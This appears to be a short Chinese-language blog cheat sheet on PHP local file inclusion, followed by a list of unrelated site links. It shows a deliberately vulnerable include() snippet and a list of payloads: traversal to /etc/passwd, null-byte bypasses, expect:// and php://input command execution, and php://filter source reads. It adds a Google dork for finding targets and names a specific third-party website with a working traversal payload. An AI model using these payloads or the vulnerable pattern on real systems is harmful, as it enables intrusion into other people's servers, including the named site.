LFI (local file inclusion vulnerability)本地文件包含
2024-09-03 02:38:47
代码实例:
<?php
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
利用方式:
/script.php?page=../../../../../etc/passwd
php?page=expect://id
?page=/etc/passwd%00
?page=/etc/passwd%2500
warpper://target
?page=php://input&cmd=ls
page=php://filter/convert.base64-encode/resource=
google hacking
inurl:index.php?page=
vulnerable website:
http://confituredebali.com/index.php?page=../../../../../../../../etc/passwd
最新文章
- JavaScript 中的相等检测
- lnmp搭建
- BP神经网络
- tomcat项目无法发布异常,Could not copy all resources to .........(转)
- [转]12篇学通C#网络编程——第二篇 HTTP应用编程(上)
- 【python】日志模块
- [笔记]PHP文件系统处理
- 初学android的第一个习作
- [每天一道A+B]签到检测程序
- win8笔记本无法搜索wifi信号找不到WLAN该 wifi共享特别注意的服务
- Git学习笔记--Git常用命令
- 快速排序(Quicksort)的Javascript实现
- IOC框架:Unity
- 线程——自定义多线程task
- centos7 network eno16777736
- 2101244 - FAQ: SAP HANA Multitenant Database Containers (MDC)
- eclipse中的yaml插件
- java基础-基础语法
- Android——BroadcastReceiver
- Spring MVC 异常处理 - ResponseStatusExceptionResolver